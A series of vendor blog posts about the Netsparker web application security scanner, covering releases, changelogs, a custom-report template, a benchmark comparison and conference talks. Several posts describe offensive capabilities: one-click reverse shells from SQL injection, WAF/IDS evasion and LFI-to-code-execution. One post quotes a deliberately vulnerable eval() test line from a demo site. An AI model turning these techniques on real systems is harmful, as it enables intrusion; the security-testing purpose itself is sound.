It's quite hard to work on something really good, something that you are proud of and not telling anyone. Now we are over that stage and our new beta has reached more than a hundred people...

Our website is up, our beta feedback forum is alive and now we're blogging. If you don't what the heck I'm talking about don't worry I'll explain.

We've just released a nice beta of our web application security scanner, named "Netsparker". It has been in private beta for the last two years and soon it will be ready for production. Lots of lovely people wanted to get their hands on it before the final release and currently they are enjoying it.

We're not looking for new beta testers, but if you have a good reason to be a beta tester please send us an e-mail and convince us why "you'll be a great beta tester", "report lots of bugs" and "suggest amazing features".

I'm not going to make this post any longer. Subscribe to our RSS feed so you can get informed about future beta releases and details of some new features.

And be prepared for something new..

Our web application security scanner was code-named "Dilemma". It was a lovely name but we had to separate our ways.

"Netsparker" is the new name. When you download the latest beta, you'll see lots of visual changes. We re-branded the whole application. It's not Extreme Makeover but you'll notice the changes.

By the way, new beta is around the corner, we're trying to squeeze some more features. Sit tight, I'll drop you an e-mail as soon as it's ready.

I don't even want to write how much we coded in the last month, (actually it's illegal to work that much, so I'm not going to give you any numbers!). It was worth it though.

The latest version of Netsparker... I'm going to put this as adequately as I can "It kicks a**". You can see details in Netsparker changelog but I'll list some highlights, so you can see why it does such a thing:

• Better performance (less CPU usage, improved HTTP performance and less requests).
• Ridiculously good SQL injection coverage, I mean really good!.
• Improved Engines: LFI and Command Injection engines improved.
• New test modules such as "crossdomain.xml", "Apache server-status, server-info", "SVN disclosure", "Find backup files", "TRACE/TRACK check" and some more stuff that you hate to check but have to check.

While you can still join the beta email list, I can't promise anything about getting a beta version soon, as we have enough testers right now.

I'm planning to keep this blog busy by adding some tutorials, videos and insider information. If you are interested in Netsparker, subscribe to the RSS, or follow on twitter@netsparker or FriendFeed-Netsparker. If you are only interested in release date, you can subscribe our release newsletter and we'll let you know as soon as it's out.

Next week I'll be speaking at AppSec 2009 in Washington DC about "One Click Ownage". This is a very practical way to get a reverse shell, reverse VNC or something like that. Basically after you find an SQL Injection in a MS SQL Server, you can carry out your own payload and run it in the target system by using one HTTP request. There are also other advantages of this such as the ability to exploit SQL Injections via CSRF attacks. 

Finally I'll publish a small tool called WebRaider which allows you to automate the whole attack. All you need to do is type the URL and click the exploit button to get a reverse shell.

I'll be hanging around at the conference between the 11^th and 13^rd. See you over there, if you are attending and fancy a quick chat, drop me an email, ferruh-at-mavitunasecurity.com.

After the conference I'll be in New York for a while, if you are in that area and interested in Netsparker, do not hesitate to contact us so that we can arrange a demonstration in your office.

After AppSec DC in Washington DC, this time we are going to IstSec 2009 in Istanbul. IstSec is potentially the biggest security conference in Turkey. Mavituna Security is one of the conference sponsors and most of our team will be there.

I'll give a short talk about "Automation, Application Security and Challenges". If you'll be there as well, don't forget to stop by our booth to say hi.

Product Tour and some feature based videos:

Product Tour

Simple Scan

Getting a Reverse Shell

LFI (Local File Inclusion) Exploitation

When I tell someone that Netsparker is “False Positive Free”, they’ll stare at me and think “Well, yet another lunatic!” They never actually said that but I can read it from their faces. They won’t say much assuming I’m a mad person who claims a scanner can avoid false positives and since I’m a mad person, I can be dangerous. I assume that’s why they generally choose to be silent after that claim!

Then I ask them a simple question:

“If you can exploit a vulnerability, can that be a false positive?”

Instantly they say “No”, then another 15 seconds of silence before they realise Netsparker actually exploits the identified vulnerabilities to ensure that the vulnerability is not a false positive.

Simply put:
“If you can exploit, it can’t be false positive”. End of discussion.

Obviously you can’t exploit everything. You can’t exploit and confirm an “internal path leakage” vulnerability without actually compromising the system via another issue. You can’t be sure if the exposed error message is actually something dangerous or just a static text.[i]

However, you can exploit an SQL Injection and confirm that it’s actually an SQL Injection and not just an error page. You can actually confirm LFI by getting files out of the system, you can confirm a Cross-site Scripting issue by executing the injection in a browser and observing JavaScript events, you can confirm a Command Injection by executing code in the system and so on.

So there you go, you can confirm almost all important issues, because all important issues have a clear impact via exploitation. It’s a huge challenge to do this automatically, though. Manually a pen tester can simply figure out the structure of an SQL Injection but automatically it takes some good engine to figure that out. I’m happy to say that with Netsparker we managed to do this quite successfully.

Now False Positive Free Scanning is Real

Netsparker made false positive free reporting a reality rather than an urban legend. I’m sure other scanners will follow us. We are happy to change the world of automated application security scanning by introducing the first “False Positive Free Web Application Security Scanner”. Also another first is “Integrated Exploitation Engine”. So you get the whole package, crawl, detect, confirm and exploit.

Important Notes

We don’t claim every single issue we report is false positive free. What we claim is if Netsparker confirms an issue then it’s not a false positive and we’ll easily confirm %80 or more of the identified issues. If we can’t exploit it, it’ll still be reported as [High] or [Low] possibility depending on the other factors.

If it was a real vulnerability and Netsparker couldn’t confirm it, all you need to this contact us and we’ll fix it.

There are many issues where it’s not possible to confirm the identified issue hence we do report them as “[Possible]” so the user knows if the vulnerability has been confirmed or not. The beauty of this is that if the report says “Confirmed”, you know you can trust it. Don’t believe it? Use the integrated exploitation panels to exploit the vulnerability yourself. Generally it only takes two clicks.

[i] Although you can guess based on some indicators such as if the HTTP status is 500 and then there is higher possibility that it’s not a false-positive. Hence Netsparker will report issues as [High Possibility] or [Low Possibility] based on similar indicators.

• We officially released and started to sell Netsparker, I forgot to mention in here!
• Jason Haddix of Security Aegis interviewed with me about Netsparker for The Ethical Hacker Network : Interview: Ferruh Mavituna on Netsparker . Thanks a lot Jason.
• Netsparker chosen as Most Promising Application Security Assessment Tool of 2009 by Security Database. It’s been only a month, so it feels great to see this.
• Two Netsparker reviews: Ethicalhack3r’s Review and Pentestmonkey’s Review

We released a new version of Netsparker, mostly improvements and bug fixes.

Use “Help > Check Updates” to get the latest version.

What’s new?

• Encoder
  We added a new panel called “Encoder” which allows you to encode and decode the data entered in various encodings as well as we added couple of common hashing algorithms.
  During a web assessment, for attacking or just for analysing you can use this tool quickly.
  
  
  
• Custom Reporting API
  Now, Custom Reporting API documentation comes with the new installer. We also updated the sample XML report. I’ll write more about custom reports in the blog.

New Confirmation Engines

In this release we focused on confirmation engines and tried to ship all confirmation engines so you will see much less “[High Possibility]” issues and you can keep your report false positive free.

Remote Code Evaluation (RCE) Confirmation Engine Added
Now, Netsparker can confirm RCE issues.

Code Injection (CI) via LFI (Local File Inclusion) Confirmation Added
An attacker can use a LFI vulnerability and local resources (such as Apache error logs) or “/proc/ *” tricks to inject a piece of PHP code and then include and execute it.
This is not new, but now Netsparker can confirm the PHP execution as well.

Improvements

• Less requests in SQL Injection engines. We tried to optimise the SQL Injection and Command Injection engines. They should produce about 15% less requests.
• SQL Injection engine now has a light scan option. This will disable checks for Boolean/Blind SQL Injection in with 2 groups. However it'll speed up the scan. LightScan is enabled by default. You can disable by setting "Advanced Settings > LightSQLInjectionChecks" to "False"
• Less CPU usage during passive analysis
• Coverage improved. Netsparker will try to access the website without cookie support to find the special “Your browser doesn’t support cookies” page.
• Mod_Negotiation engine updated. Now Netsparker has far smarter checks to identify Mod_Negotiation issues.
• Cross-site scripting issues are now reported with alert() proof of concepts

Bug Fixes and Other Stuff

• Parsing issues with some relative links addressed. This was affecting links beginning with a question mark (?) without a path.
• Extra "&" characters in some GET requests fixed.
• Some SQL Injection attacks constructed correctly to bypass weak blacklisting and filters.
• An encoding problem addressed in SQL Injection exploitation. This was causing Netsparker not to encode the user's input in SQL Injection which works with POST.
• Other minor fixes.

I’ll try to write a new tip or tutorial every week in here. Let’s start with Netsparker’s custom reporting API.

How does it work?

During the startup of Netsparker, it scans for C# code files (*.cs) in the "ReportTemplates" directory located under Netsparker's installation directory. Every identified file will be visible in the "Reporting" menu as a custom report.

Scripting Language

Netsparker’s scripting language is C#. Even if you haven’t code in C# before, it shouldn’t be a problem. It’s pretty easy to make simple changes.

Here is a sample custom report:

<%@ Assembly Name="MSL.Project" %>
<%@ Assembly Name="MSL.Interfaces" %>
<%@ Assembly Name="MSL.Shared" %>
<%@ Import NameSpace="FM.Dilemma" %>
<%@ Import NameSpace="System.Collections" %>
<%@ Import NameSpace="System.Collections.Generic" %>
<%@ Import NameSpace="System.Security" %>
<%@ Argument Name="vulns" Type="Array" %>
<%@ Argument Name="settings" Type="ScanSettings" %>
<?xml version="1.0" encoding="utf-8" ?>
<netsparker generated="<%=DateTime.Now.ToString()%>">

    <target>
        <url><%=SecurityElement.Escape(settings.Uri.ToString())%></url>
    </target>

<%
foreach(Vulnerability vuln in vulns){
%>
    <vulnerability confirmed="<%=vuln.Confirmed.ToString()%>">
        <url><%=SecurityElement.Escape(vuln.RequestUri.ToString())%></url>
        <type><%=vuln.Type%></type>
        <severity><%=vuln.ExtendedType.Severity.ToString()%></severity>
        <vulnerableparametertype><%=SecurityElement.Escape(vuln.UriManager.AttackParameter.Type.ToString())%></vulnerableparametertype>
        <vulnerableparameter><%=SecurityElement.Escape(vuln.UriManager.AttackParameter.Name)%></vulnerableparameter>
        <vulnerableparametervalue><%=SecurityElement.Escape(vuln.UriManager.AttackParameter.Value)%></vulnerableparametervalue>

        <rawrequest><%=SecurityElement.Escape(vuln.RawRequest)%></rawrequest>
        <rawresponse><%=SecurityElement.Escape(vuln.RawResponse)%></rawresponse>

        <extrainformation>
        <%
            foreach(KeyValuePair<string, CustomField> cField in vuln.CustomFields){
        %>
            <info name="<%=cField.Key%>"><%=SecurityElement.Escape(cField.Value.Value)%></info>
        <%
            }
        %>
        </extrainformation>
    </vulnerability>

<%
}
%>
</netsparker>

This will generate an XML file which includes:

• All vulnerabilities
• Vulnerable Parameter and type (GET/POST)
• Vulnerability Details
• Confirmation Status
• Extra exploitation data
• Scan time
• Vulnerability severity etc...

You can add more details into the reports or customise them as much as you want.

Documentation

You can find MSDN style API documentation under the “ReportTemplates” directory, in the file “NetsparkerReportingAPI.chm”.

Defining the extension of the report

Name of the “.cs” file will be visible under the “Reporting“menu and when user click to it, generated report will use the extension from the custom report file name.

For example:

• “Vulnerabilities List (XML).xml.cs “ - File extension will be “xml”
• “Vulnerabilities List (XML).html.cs” - File extension will be “html”

Testing the code

You don’t need to restart Netsparker every time you change the source code of your report. After Netsparker adds it to the report menu once all you need to do is run it again. If it fails to compile it’ll let you know with an error message.

Sample Code

A sample report ships with Netsparker called “Vulnerabilities List (XML).xml.cs” which is a simple report which generates an XML report with all identified vulnerabilities.

Support

If you need any help just send us an email or give us a ring, we’ll be happy to help you out.

Security

The reporting engine runs with current user’s privileges. So don’t run the report unless you trust the author of the custom report code.

Denim Group has released Vulnerability Manager, in their own words:

Denim Group's Vulnerability Manager allows security teams to import and consolidate application-level vulnerabilities, automatically generate virtual patches, monitor attack attempts, communicate with defect tracking systems, and evaluate team maturity. Because this is done in a centralized system, application security managers have greatly increased visibility into and control of these processes, and they are collecting data that can be used to support sophisticated conversations with their managers and executives.

This is great for Netsparker users because Vulnerability Manager can import Netsparker XML reports. Since Netsparker can confirm the idenfied vulnerabilities and mark them on the XML output you can simply generate WAF rules or send these identified vulnerabilities to the related defect tracking system without checking for false positives. You can even automate the whole process, you don’t need a person to check the vulnerabilities before deploying the patches.

The tech preview release demo of Vulnerabiltiy Manager:

Netsparker’s new “Automate That” [1] release is ready. It’s not just about bug fixes or improvements, we’ve also got two great new features and two big improvements. Command Line Support to automate and integrate your scans with other tools. Schedule Support so that you can scan stuff overnight or scan your application weekly and obtain reports. We decreased the request count during the attacking phase without sacrificing our coverage and added a bunch of new confirmation engines.

Schedule Support

One of the most requested features was Scheduling Support, finally we added it. It doesn’t require an extra service to install and will integrate itself to “Windows Task Scheduler”. It works correctly under Windows XP, Windows 2003, Windows Vista, Windows 7.

Command Line Support

Command line can be used to call Netsparker from another application for manual scanning, for example internally we’ve got a Firefox test extension which launches Netsparker with the current page’s URL by using the following command line:

Netsparker.exe /u [Current Page]

If you want to automate the whole scan, the best way to do is create a new profile from the “Start New Scan” window. Afterwards you can launch a new scan with your profile name. You can share these profiles between computers, they are stored in "My Documents\Netsparker Scans\Profiles".

Netsparker.exe /a /p QuickSQLI /u http://nightlybuild.example.com /rt "Vulnerabilities List (XML)" /r c:\reports\report-%date%-%time%.xml

This will scan the URL with the given profile and will save the XML report to c:\reports\ folder. %date% and %time% will be dynamically replaced with start date and time of the scan, so you don’t have to change the report name every time you run it. If you need a custom output you can use create your own report with Netsparker’s Custom Reporting API.

Command Line Parameters:

Performance Improvements

• Amount of requests to identify vulnerabilities drastically decreased. We optimised all of our attacks, combined some attacks into one and in the end we started to send 35% less requests and we opened some space to make our coverage even better by decreasing the amount of requests . This means shorter attacking phase.
• Smart caching added to some detection engines to decrease CPU usage. If you have a powerful system you might not notice this at all. It’s an increase of about 2-3%.

New Security Checks

• ASP.NET ViewState analysis added
  • ViewState is not signed
  • ViewState is not encrypted
  • ViewState view panel. When you go to “HTTP Request/Response”, if the page has ViewState in it, this panel will be visible automatically. If the ViewState is not encrypted, then you can see the data in it.

New Confirmation Engines

Confirmation engines ensure that you won’t have a false-positive and you will see less [Possible] vulnerabilities. When these vulnerabilities get confirmed you’ll see Netsparker’s famous Confirmed icon!

• RCE (Remote Code Evaluation) confirmation engine added.
• RFI (Remote File Inclusion) confirmation engine added.
• Command (Remote File Inclusion) confirmation engine added.

Improvements

• Cross-site scripting engine updated. The new engine is faster and gives out less possible errors, it also allowed us to add more XSS checks. However, there are some missing bits in the new engine. This might cause to miss some rare XSS cases. We are working on this problem.
• Permanent XSS detection improved. Currently there is no Confirmation engine for permanent XSS checks. We're working on this problem.
• Start new scan screen remembers the last used profile.
• Extra confirmation stage added to dashboard. Extra confirmation triggers in some Blind SQL Injection issues. It's a required step to avoid false-positives although it can take minutes depending on the vulnerability.
• Better coverage in many engines but mostly SQL Injection (new ORACLE, MySQL and SQL Server attacks added and optimised to work in more cases)
• Cross-site scripting issues now reported with alert() proof of concepts for easier copy & paste
• We added new default profiles. You can always create your own custom profiles.
  • Full Scan – SQL Server (checks for everything but SQL Injection attacks optimised for SQL Server backend database which makes the scan faster)
  • Full Scan – MySQL (checks for everything but SQL Injection attacks optimised for MySQL backend database which makes the scan faster)
  • Fast – No JavaScript (checks for everything but Netsparker won’t parse / interpret JavaScript, which speeds up the scan, especially the crawling phase)

Bug Fixes

• A bug fixed in the JavaScript parser which was causing consistent crashes in some AJAX cases
• Parsing issues for some relative links addressed. It was affecting links starting with a question mark (?) without a path.
• Some SQL Injection attacks constructed correctly to bypass weak blacklisting and filters.
• An issue in dashboard causing display of incorrect figures in some scans addressed.
• A parsing bug addressed in pages with external JavaScript references
• The bug in the "[Possible] Source Code Disclosure" vulnerability addressed.
• A problem in Configure Authentication Tab addressed. This problem was affecting logout views with heavy JavaScript.
• There were some problems in Blind SQL Injection detection in ORACLE. Those issues were addressed, now Blind SQL Injection works correctly even with many grouped ORACLE SQL Queries .
• Null byte reporting in the XML file was addressed, which was causing problems in XML parsers. Currently all reported URLs are encoded correctly in the report.
• Issues weren't sorted correctly. Confirmed issues were listed after possible issues in the same severity.
• A bug addressed which was causing cookie save checkbox to be kept enabled in the profile save dialog.

[1] All alpha / beta releases of Netsparker had a release code name. Generally with a cheesy reference such as “Fast & Furious” Release, “So tell the girls I’m back in town” Release, “Getting There” Release. It was fun. We thought it’d be nice to give a code name to our public releases as well.

Apparently we are much better at writing code than writing blog posts! We have released v1.1.5.0089, 2 days ago.

This is a small update, especially addresses some minor bugs and lack of software manual. 

• Improvements
  • Confirmation stages added to Dashboard
  • Help Documentation added to installer. You can access it from the “Help” menu or you can press F1.
  • Error Based SQL Injection support for Postgres added
• Bug Fixes
  • One character limit bug in SQL Injection exploitation panel addressed
  • Netsparker Blog link added to Help menu
  • A bug in internal path disclosure addressed. The bug was causing to miss some issues.
  • Merge scan was causing losing old issues from the issues panel during the load and new scans.
  • Incorrect figures in dashboard during the Recrawling phase issue addressed.
  • Some messagebox skins corrected to match the Netsparker’s main skin
  • Scope problems in XML HTTP Requests analysed by Javascript Parser addressed. Now JavaScript parser correctly obeys to include/exclude rules and scan scope.
  • Licence Loader skin changed to native for Windows 7/Vista

     

You can use “Help > Check Updates” to update Netsparker.

Ha.ckers blog published Larry’s new report: “Accuracy and Time Costs of Web Application Security Scanner Report”.

Unfortunately Larry never contacted us so we didn’t know that he was doing such a test. However as soon as the report was out we conducted the very same test as methodology was straight forward.

Also we sent an email to Larry and offered fully-functional trial version for him to conduct the test as well. Anyone with full or demo version of Netsparker can repeat these tests easily.

How did we conduct the test?

• We used the last public version of Netsparker 1.1.5.87
• We have not trained the scanner other than changing the start URL of the scans.
• We attached the save files, Netsparker database and XML reports. So you can see the results by yourself. If you don’t have Netsparker than you can take a look at our XML reports. Download reports and save files.
• We considered [High Possible] vulnerabilities as vulnerable and if [High Possible] vulnerability was not correct then it considered as False Positive, although all high possible issues we correct.

This is the overall output:

Two charts exactly like Larry’s report, we added Netsparker to the results.

As you can see after NTO Spider, Netsparker is the best scanner when “Trained” and the second best trainer in “Point and Shoot” right after NTO and IBM AppScan.

False-Positive Free Scanning

We delivered what we claimed and the report was false-positive free.

Although 1.1.5.87 release caused some LFI bugs which already has been addressed and will be deployed in the next release. This caused [High Possible] LFI vulnerabilities. None of them were confirmed (obviously!) but it was quite irritating, for full-disclosure I wanted to point out that clearly. We spotted some instances unconfirmed possible LFI issues in all Permanent XSS locations . Since we considered [High Possible] as vulnerability, we’ll consider these as False-Positives. We addressed this problem in v1.1.5.91, use “Help > Check Update” to update Netsparker.

Training Time

Actually Netsparker has not many training options because it doesn’t require any. It picks up many URL Rewrites automatically, it detects Custom 404’s on the fly, 99% of the time you don’t need to tweak it. It just works. In this case all we did was changing the start URL of the scan. So our training time was something between a second and a minute. Depending on how fast we can copy & paste a URL.

Overall Human Time/Cost

Larry calculated the overall human time/cost with the following formula:

Training time + (# False Positives * 15min) + (# False Negatives * 15min)

This is the original chart (in minutes, lower is better):

However since none of the scanners in the test has a confirmation engine like Netsparker he excluded the fact that even though all of the issues are not false-positives you still have to analyse them, otherwise you wouldn’t know if they are false-positive or not.

This is not an issue with Netsparker as we can confirm vulnerabilities. Out of 103 identified vulnerabilities we confirmed 87 of them, so we confirmed 84% of all identified issues. This could’ve been much higher if the test websites were using MySQL, ORACLE or MS SQL or even Postgres (we have limited support) instead of MS Access. I’ll discuss this further at the end of this post.

So I’ve revised Larry’s function and made it more realistic by adding one more criteria, time to confirm that a vulnerability is not a false positive. 15 minutes would have been harsh as some issues could be really obvious so I used 3 minutes for per identified vulnerability which is quite naive.

Revised Formula:

Training time + (# False Positives * 15min) + (# False Negatives * 15min) + ( # Identified none FP Vulnerabilities * 3 min )

Updated and more realistic results (in minutes, lower is better):

Netsparker identified 5 new vulnerabilities that other scanners missed

Netsparker identified 7 new vulnerabilities that all of the other scanners missed:

• NTO Webscantest
  • URL Based XSS in /datastore/search_get_by_id.php and in many other URLs
  • XSS in “method” parameter in /soap/wsdlclient12.php
• Acunetix testPHP
  • XSS in “uphone” parameter in “/userinfo.php”
• Cenzic Crackme
• Permanent XSS in /kelev/php/loanrequestlist.php
• Permanent XSS in /kelev/php/approveloanpage.php

UPDATE: 2 of the issues removed from zero.webappsecurity.com because they were duplicates, we didn’t notice it in the first analysis. 

A Funny Vulnerability(!)

We observed that Netsparker missed a remote code evaluation vulnerability according to the Larry’s results.

I don’t know how Larry confirmed all vulnerabilities but this is certainly not exploitable :)

From “http://testphp.acunetix.com/comment.php” and “phpaction” parameter.

if ($_POST["phpaction"] == "printf(md5(acunetix_wvs_security_test));exit;//") eval($_POST["phpaction"]);

So it’s not actually a vulnerability it’s just a PoC vulnerability to demonstrate Acunetix’s related checks.

UPDATE: I want to make it clear that this is obviously not an intentional code to block other scanners. This is just a test page for Acunetix scanner for their customers and demo versions. Which make a lot of sense to do such a thing, all I wanted to point out that this issue should be excluded from the test and leaving such an issue in the report might raise questions about other issues. I’m not quite sure if there are any other issues like this in the report as we haven’t investigated every single one of them. My apologies to our friends in Acunetix if I seemed like accusing them, that definitely wasn’t my intention.

What and Why Netsparker Missed?

• Netsparker missed some XSS vulnerabilities in forms. Netsparker did fill up everything correctly which means it missed the cross-site scripting issues in validation pages. Because it hasn’t seen the validation page at all. This issue was on our list and we’ll try to address it as soon as possible.
• Netsparker missed some error message information disclosure, because they are so prone to false-positives. In real world reporting such issues should cause a lot false-positives. Netsparker missed about 6 error messages issues. Just to be clear Netsparker reports debugging related information but these pages were barely leaking any debug related information hence Netsparker didn’t report.
• Couldn’t confirm or missed MS Access SQL Injections. Netsparker engines are specifically designed for ORACLE, MS SQL and MySQL. Currently we are in the process of adding Postgres and will eventually add support for all popular DBMSes. Basically if you change MS Access backend of all these systems to ORACLE, MySQL or MS SQL Netsparker would find and confirm those vulnerabilities. Obviously this is not an excuse to miss a vulnerability and we’re trying to do our best to add these new database engines. Netsparker especially was bad in IBM AppScan’s testfire website due to this problem.
• Netsparker missed all attacks based on HTTP Header or Cookies because currently it doesn’t support. This is known limitation, in our roadmap and will be addressed.

Conclusions

We were expecting good results and we got it. Although I still think Netsparker would have performed better in more realistic scenarios. For example I haven’t notice any Full-Blind SQL Injection (time based) vulnerabilities in the whole test.

One of the most unrealistic things about the report is the amount of false-positives possibilities in the test websites. If you haven’t use any of these scanners just ask anyone and they’ll tell that they definitely report more than 2-3% false-positive issues in every scan.

Report proves that Netsparker’s Confirmation and False-positive Free Scanning feature is a real time saver.

Download Test Files and XML Reports

• Netsparker Vulnerability Tables – VulnerabilityTables.pdf
• Overall, Chart Document – Charts-Overall.ods
• Netsparker “XML reports” and “.dlm” scan files. You need Netsparker 1.1.5.87 for opening “.dlm” files” – Reports.zip

Do you want to test it too?

You can request a demo and try Netsparker’s fully-functional evaluation version.

It was a good month, here is a quick overview:

• We have a Demo Request page now.
• We released two new versions (v1.1.2.3 and v1.1.5.0057) with bunch of new features and fixes.
• Talked about Custom Reporting
• Denim Group released Vulnerability Manager which supports importing Netsparker XML Reports.
• We added Netsparker to Larry’s report and Netsparker was the second best out of 8 scanners (third in Point and Shoot mode). Everyone is talking about how you need to train your scanner. We finished the whole report in a day, Netsparker is that easy to use. Configuring Netsparker only took our 5 minutes in total, not more.
• We sent bunch of t-shirts all over the world, Spain, UK, Turkey, USA, Canada, Singapore, Brazil… to our beta testers and users to thank them.
• The Academy Pro posted a Netsparker video

What’s Next

• Some of our users were having memory related issues with big websites (more than 100K requests). We addressed this problem currently Netsparker’s memory footprint is much lower and it can send more than a couple of million requests without a problem. We are still testing these changes and will release it soon.
• We added a new settings interface, looks nice doesn’t it?
• We are working on couple of other stuff and will post about them soon.

Subscribed to RSS Feed or follow on twitter for updates.

We've been frantically working on the new version of Netsparker. We addressed lots of minor issues, added some new features, improved many of the engines but most importantly fixed all memory related problems.

Better memory management

We received some bug reports regarding that our users were getting "Out of Memory" exceptions in big websites. Yes, almost all other web application security scanners crash in big websites, it might be acceptable for them but not for us.

So we fixed all memory related problems. It doesn't matter how big the HTTP response is, 10kB or 4096kB, it doesn't matter that Netsparker needs to do 100 requests to 2 million requests it will work just fine and won't cost you more than 300MB of memory. You might still experience some problems if you need to do more than 5 million requests due to our storage and optimisation design, however I'm pretty sure 5 million attacks will cover almost all websites and when you in doubt you can always scan folders separately and then Netsparker can merge the scan results from "File > Open" for you.

Permanent/Stored Cross-site Scripting Improvements

We improved the detection and reporting of Permanent Cross-site Scripting issues. Now you can see the details of the injection request as well as the output point. This way you can simply spot the vulnerable location.

Unfortunately Permanent XSS engine doesn't support confirmation yet but we are working on it.

Better Cross-site Scripting (XSS) Confirmation Engine

As you know Netsparker is the first and only scanner which can confirm vulnerabilities to eliminate false positives. We massively increased confirmation in XSS engine to provide one click proof of concepts to our users. Now the extra confirmation engine will try to find the easiest XSS exploit before going to more obscure ones.

Some attacks are revised and many attacks to bypass WAF/IDS added.

New Settings Interface

Even though Netsparker tries to do everything for you, detecting URL Rewrites, custom 404 page patterns, best exploitation speed etc. sometimes you want to go into details and fine tune the settings for a web application test.

Our previous settings interface was hideous so we replaced it with a new shiny interface:

Netsparker still hides some advanced settings as 99% of users don't really need to change them, however if you are really curious and somehow know what you are doing you can hold "Ctrl" button while clicking to "File > Settings > Settings" and get the advanced and still "hideous" settings interface.

If you mess up the configuration go to "Settings" and click "Reset Settings".

JavaScript parser issues

We received bug reports about NetsparkerHelper was crashing in some websites. These issues addressed and fail-safe check added to NetsparkerHelper as it'll recover itself silently so your scan can continue as it supposed to even when there is something unexpected.

Local File Inclusion (LFI) Engine Improvement

LFI is a still common and dangerous vulnerability. We fixed some problems in the confirmation engine. It wasn't confirming some LFI vulnerabilities in *nix systems.

We added new attacks to bypass blacklisting filters, IDS/WAFs. Exploitation improved and many minor bugs addressed.

Resume Feature

In the previous version there were some bugs when you try to load an unfinished scan and try to resume. We addressed these bugs so you can save a scan in the middle of crawling, attacking or anything else and then load and continue later on.

Better Time Based Blind SQL Injection Detection

It's clear that Netsparker has the best SQL Injection detection engine when it comes to MySQL, ORACLE and SQL Server. Unlike other scanners Netsparker doesn't just to "OR 1=1" it analysis the backend database, carries out many specific test to find SQL Injections in many situations then confirm the SQL Injection by safely exploiting it and finally do the post-exploitation attacks to find more issues such as database user has administrator priviliges.

In this new version we updated the Blind SQL Injection to make it even better. Now Blind SQL Injection engine analysis server responses, identifies required wait times and this means even when the responses from the server is unusually slow or the application is a bit unreliable Netsparker still can identify and confirm the SQL Injection.

Old School Changelog

• Issue reports quality increased by adding and refining the content
• There is a new option for waiting all static resource attacks before skipping to the attacking phase. By default Netsparker will not wait to find all directories to skip the Crawling phase, you can override this from the settings.
• URL Based XSS attack patterns improved.
• Permanent/Stored Cross-site Scripting (XSS) reports are not much better. It shows the injection point, output point and all other required details in the report.
• LFI Engine is improved. Couple of bugs fixed, we add IDS/WAF evasion techniques, new attacks a new confirmation to confirm more LFI issues.
• Minor form authentication related bugs fixed.
• A new vulnerability check added that converts limited LFI attacks to Cross-site Scripting.
• LFI exploitation related bugs fixed.
• In the last update due to some internal changes we had to remove Cross-site Scripting detection in "script" blocks. Now it's back with confirmation.
• Support for XSS in HTML comments is back with confirmation.
• Report threshold increased for possible SQL Injections. Means less [Possible] reports.
• A new check added to report if the configured Form Authentication doesn't seem to work and extra checks added to avoid recursive loops in incorrect form authentication settings.
• Crashes in JavaScript parser (NetsparkerHelper) addressed also extra checks added to recover itself in case of a crash.
• Some bugs addressed related ViewState decoding and ViewState analysis now supports .NET Framework 1.x ViewState.
• GUI performance increased, even when more than 100 vulnerability reported per second GUI stays responsive.
• Overall performance increased, now Netsparker can process more than 500 requests per second in a Core i7.
• We massively decreased the usage of memory in Netsparker. You can test really big websites which takes days to scan and millions of requests to attack and Netsparker will manage to finish the scan and won't use too much memory.
• Data Length bug in SQL Injection exploitation addressed.
• In some Windows XP systems JavaScript parser crash addressed.
• During the JavaScript analysis XMLHTTP Requests scope bypass addressed. (was bypassing include/exclude rules and scan scope).
• Incorrect figures in dashboard during the Recrawling phase issue addressed.
• A bug in getting a reverse shell from boolean based SQL Injections addressed.
• A theme problem addressed in message boxes.
• Merge scan was causing losing old issues from the issues panel during the load and new scans.
• There were some bugs about resuming a loaded scan. Now Netsparker can resume scanning from any previously saved scan. So you can start scanning and then save it in the middle of a scan. Load it later on and continue.
• One of the XSS attacks was missing from the Permanent/Stored XSS detection. This issue has been addressed.
• Blind SQL Injection confirmation is improved. In new confirmation engine Netsparker can analyse the server request performance and tweak attacks to perfectly server overhead and confirm Blind SQL Injections even in really slow or unstable connections.
• A problem in Static Checks addressed. This was causing to miss some hidden directories if the initial requested directory returns 3xx code.
• Some bugs in heuristic URL Rewrite detection in big websites addressed.
• A bug was causing crawling stage to stuck in last 1 or 2 requests addressed. This was happening only 1 in 100 scans.
• Licence Loader theme changed to native OS theme for Windows 7/Vista.
• New settings interface introduced. It explains all the important settings and allows you to configure them easily. If you know what you are doing and want to access all advanced settings click to hold "Ctrl" and click to "Settings" this will open the advanced settings panel instead of the new settings panel.
• A bug in saved login scripts addressed.
• Request Monitor removed. If you need similar functionality please refer to How to see all HTTP Requests and Responses topic.

We are giving away one Netsparker Professional license to The Academy Pro Contest, see the details.

Big news for us, our customers and the whole security community…

Netsparker^® Free Community Edition

Mavituna Security Ltd is proud to announce the release of Netsparker Community Edition.

Netsparker Community Edition is False Positive Free and can detect both SQL Injection and Cross-site Scripting issues better than many other scanners.

Netsparker Community Edition also detects many other vulnerabilities such as finding and reporting backup files, source code disclosures, Crossdomain.xml issues, SVN/CVS disclosures, internal path disclosures, error messages and many more.

Don't take our word for it, simply fire up your favourite scanner and compare the results with those from Netsparker Community Edition. You won't see a False-Positive from Netsparker Community Edition and it'll find more vulnerabilities.

Web application security is a big challenge and Netsparker® Community Edition is a vital tool for the security community and developers alike.

Netsparker^® Professional

Netsparker Community Edition shares the same base engine with Netsparker® Professional.

The Netsparker^® family are not simply more web application security scanners but represent a step forward into the next generation. Netsparker features False Positive Free Scanning, Integrated Exploitation, Post-Exploitation Vulnerability Assessment and accurate detection.

Netsparker Professional users also benefit from enterprise features, more security checks, priority technical support and updates.

DOWNLOAD NETSPARKER COMMUNITY EDITION

Regards,

Ferruh Mavituna
Founder and Lead Developer of Netsparker

Apparently by exploiting a Cross-site Scripting vulnerability some attackers gained access to users' passwords in Apache.org and JIRA (some passwords in JIRA were plain-text).

Today when I hear the news I decided to download the latest demo version of JIRA and give it a try with Netsparker. Not surprisingly Netsparker identified more than 10 XSS vulnerabilities in JIRA.

Obviously I don't know the details of the attack or if the attack was only based on one of these Cross-site Scripting vulnerabilities, but presumably this attack would have been prevented if either JIRA or Apache.org would have used Netsparker Professional or free version of Netsparker Community Edition.

I already dropped an email to Apache Security Team and offered them a free Netsparker Professional License.

Currently Netsparker is still scanning the test system, but already identified many XSS instances, Permanent XSS issues and many other minor issues.

Lots of improvements in Permanent XSS, XSS and SQL Injection engines. We added experimental Second Order SQL Injection support as well.

There were some issues regarding to Proxy and Proxy Authentication, all those issues addressed as well.

There are many other improvements and some bug fixes, check out the details in the Netsparker v1.3.7.38 changelog.